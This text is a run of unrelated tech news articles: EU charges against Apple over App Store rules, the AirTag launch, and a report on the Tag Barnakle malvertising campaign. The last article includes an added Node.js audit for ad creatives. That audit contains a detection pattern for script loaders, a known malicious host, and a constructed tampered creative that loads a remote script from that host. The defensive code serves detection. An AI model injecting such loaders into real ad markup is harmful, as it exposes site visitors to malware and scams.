Margrethe Vestager, the EU’s competition chief, will later this week issue charges against Apple stating that its App Store rules break EU law, according to several people with direct knowledge of the situation.
The charges relate to a complaint brought two years ago by Spotify, the music streaming app, that Apple takes 30 percent commission to distribute apps through its iPhone App Store and forbids apps from directing users to pay for subscriptions elsewhere.
Brussels opened an official competition investigation in June, when Vestager said Apple appeared to be a so-called gatekeeper “when it comes to the distribution of apps and content to users of Apple’s popular devices.”
Apple, which has denied any allegations of anticompetitive behavior, did not immediately reply to a request for comment. At the time of Spotify’s initial complaint, Apple said the music app wanted to “keep all the benefits” of its App Store “without making any contributions to that marketplace.”
The case is one of the most high-profile antitrust cases in Europe against a US tech group. The people familiar with the process warned that the timing could still slip.
Brussels is also investigating Apple for allegedly breaking EU laws when it comes to promoting its own ebooks over rivals on the App Store and over concerns that it undermines competition in mobile payments by limiting access to the near-field communication chips in iPhones for rivals to Apple Pay.
If Apple is ultimately found guilty of breaking EU rules, after a long period of potential appeals, the company faces a fine of up to 10 percent of global revenues.
Separately, Brussels is pushing through a new Digital Markets Act that seeks to define when Big Tech companies are behaving in an anti-competitive way so that remedies can be applied faster.
Spotify’s complaint against Apple
March 2019: Spotify launches official complaint against Apple in the EU. Spotify CEO Dan Ek warns of rising prices due to App Store’s fees.
May 2019: EU officials say they are preparing an official investigation.
June 2020: The EU begins probes against Apple Music, Apple’s ebook business, and Apple Pay.
March 2021: The EU says it is considering formal charges against Apple over Spotify’s complaint.
Apple began taking orders Friday for its new AirTags location-tracking product and the new purple color for the iPhone 12, but AirTag supply is already falling behind demand.
Announced earlier this week, AirTags are Apple’s answer to the already established and relatively popular Tile product. Each AirTag is a small disc that can be attached to a valuable possession so you can track it with your iPhone if you lose it.
Each AirTag sends out a Bluetooth signal that nearby compatible devices in the “Find My” network detect. When a device detects the AirTag, it reports its location, and you can use the newly rebranded “Find My” app to locate it; Apple claims the process is anonymous, secure, and encrypted.
Additionally, recent iPhone models that have Apple’s U1 ultra-wideband chip (the iPhone 11 and iPhone 12 families) enable a feature called precision finding, which guides you directly to the AirTag with more precision.
A single AirTag costs $29, but they are also sold in packs of four for $99. If you order through the Apple store, you can get your AirTag engraved at no additional charge, but that service is not available through other retailers.
Unfortunately for those excited to snag AirTags imminently, orders are already backed up two to five weeks in Apple’s online store. When you might get an AirTag depends on whether you opt for engravings; as of this writing, AirTags that are engraved are estimated to deliver as late as June 1, while AirTags that are not engraved could arrive as soon as May 3.
In addition to the AirTags themselves, Apple is selling numerous AirTags accessories, like key rings and luggage tags that can house the devices. They come in a range of colors, like saddle brown, sunflower, pink, and blue. Many of the accessories are made with partners Apple has worked with on iPhone or Apple Watch accessories in the past, like Belkin or Hermès.
As noted above, Apple is also selling a new purple variant of the iPhone 12 and iPhone 12 mini. At present, the purple iPhone 12 is still showing its initial intended delivery date: April 30.
Hackers have compromised more than 120 ad servers over the past year in an ongoing campaign that displays malicious advertisements on tens of millions, if not hundreds of millions, of devices as they visit sites that, by all outward appearances, are benign.
Going for the jugular
Infiltrating the ad ecosystem by posing as a legitimate buyer requires resources. For one, scammers must invest time learning how the market works and then creating an entity that has a trustworthy reputation. The approach also requires paying money to buy space for the malicious ads to run. That’s not the technique used by a malvertising group that security firm Confiant calls Tag Barnakle.
“Tag Barnakle, on the other hand, is able to bypass this initial hurdle completely by going straight for the jugular—mass compromise of ad serving infrastructure,” Confiant researcher Eliya Stein wrote in a blog post published Monday. “Likely, they’re also able to boast an ROI [return on investment] that would eclipse their rivals as they don’t need to spend a dime to run ad campaigns.”
Over the past year, Tag Barnakle has infected more than 120 servers running Revive, an open source app for organizations that want to run their own ad server rather than relying on a third-party service. The 120 figure is twice the number of infected Revive servers Confiant found last year.
Once it has compromised an ad server, Tag Barnakle loads a malicious payload on it. To evade detection, the group uses client-side fingerprinting to ensure only a small number of the most attractive targets receive the malicious ads. The servers that deliver a secondary payload to those targets also use cloaking techniques to ensure that they also fly under the radar.
When Confiant reported last year on Tag Barnakle, it found the group had infected about 60 Revive servers. The feat allowed the group to distribute ads on more than 360 Web properties. The ads pushed fake Adobe Flash updates that, when run, installed malware on desktop computers.
var aBdDGL0KZhomY5Zl = document["createElement"]("script");
As the de-obfuscated code shows, the ads are served through overgalladean[.]com, a domain that Confiant said is used by PropellerAds, an ad network that security firms including Malwarebytes have long documented as malicious.
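An added example, not code from Confiant or the original article: a Node.js audit that flags ad creatives containing the dynamic script-loader pattern seen in the de-obfuscated line above, or referencing hosts outside a publisher's allowlist. The allowlist hosts, creative IDs and sample markup are constructed assumptions; the only indicator taken from the article is overgalladean[.]com.

```javascript
// Added example: audit ad creatives for injected script loaders.
// Allowlist hosts, creative IDs and sample markup are constructed for illustration.
const refang = (s) => s.replace(/\[\.\]/g, ".");

const ALLOWED_HOSTS = new Set(["ads.publisher.example", "static.publisher.example"]);
// The only indicator taken from the article, stored defanged as published.
const KNOWN_BAD_HOSTS = ["overgalladean[.]com"].map(refang);

// Matches document.createElement("script") and document["createElement"]("script").
const SCRIPT_LOADER =
  /document\s*(?:\.\s*createElement|\[\s*["']createElement["']\s*\])\s*\(\s*["']script["']\s*\)/;
// Absolute and protocol-relative URLs; captures the host name.
const URL_HOST = /(?:https?:)?\/\/([a-z0-9.-]+\.[a-z]{2,})/gi;

const isKnownBad = (host) =>
  KNOWN_BAD_HOSTS.some((bad) => host === bad || host.endsWith("." + bad));

function auditCreative(id, markup) {
  const hosts = new Set();
  for (const m of markup.matchAll(URL_HOST)) hosts.add(m[1].toLowerCase());
  const unknownHosts = [...hosts].filter((h) => !ALLOWED_HOSTS.has(h));
  const findings = [];
  if (SCRIPT_LOADER.test(markup)) findings.push("dynamic-script-loader");
  if (unknownHosts.length > 0) findings.push("host-not-allowlisted");
  if (unknownHosts.some(isKnownBad)) findings.push("known-bad-host");
  return { id, findings, unknownHosts };
}

// Constructed creatives: one untouched, one with an appended loader.
// Only the createElement line is from the article; the src line is constructed.
const CLEAN =
  '<a href="https://ads.publisher.example/click?id=1">' +
  '<img src="https://static.publisher.example/banner.png"></a>';
const TAMPERED =
  CLEAN +
  '<script>var aBdDGL0KZhomY5Zl = document["createElement"]("script");' +
  'aBdDGL0KZhomY5Zl["src"] = "//' + KNOWN_BAD_HOSTS[0] + '/placeholder.js";</script>';

// Returns only the creatives that produced at least one finding.
function auditAll(creatives) {
  return creatives
    .map(([id, markup]) => auditCreative(id, markup))
    .filter((r) => r.findings.length > 0);
}

const report = auditAll([["banner-1", CLEAN], ["banner-2", TAMPERED]]);
console.log(JSON.stringify(report, null, 2));
```

A finding is a prompt to compare the creative against what the advertiser actually supplied, since legitimate third-party tags also load scripts dynamically.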
When Confiant replayed the PropellerAds click tracker on the types of devices Tag Barnakle was targeting, it saw the ads that were being served.
Tens of millions served
The ads mostly lure targets to app store listings for fake security, safety, or VPN apps that carry hidden subscription costs or “siphon off traffic for nefarious ends.”
With ad servers frequently integrated with multiple ad exchanges, the ads have the potential to spread widely through hundreds, possibly thousands, of individual websites. Confiant doesn’t know how many end users are exposed to the malvertising, but the firm believes the number is high.
“If we consider that some of these media companies have [Revive] integrations with leading programmatic advertising platforms, Tag Barnakle’s reach is easily in the tens if not hundreds of millions of devices,” Stein wrote. “This is a conservative estimate that takes into consideration the fact that they cookie their victims in order to reveal the payload with low frequency, likely to slow down detection of their presence.”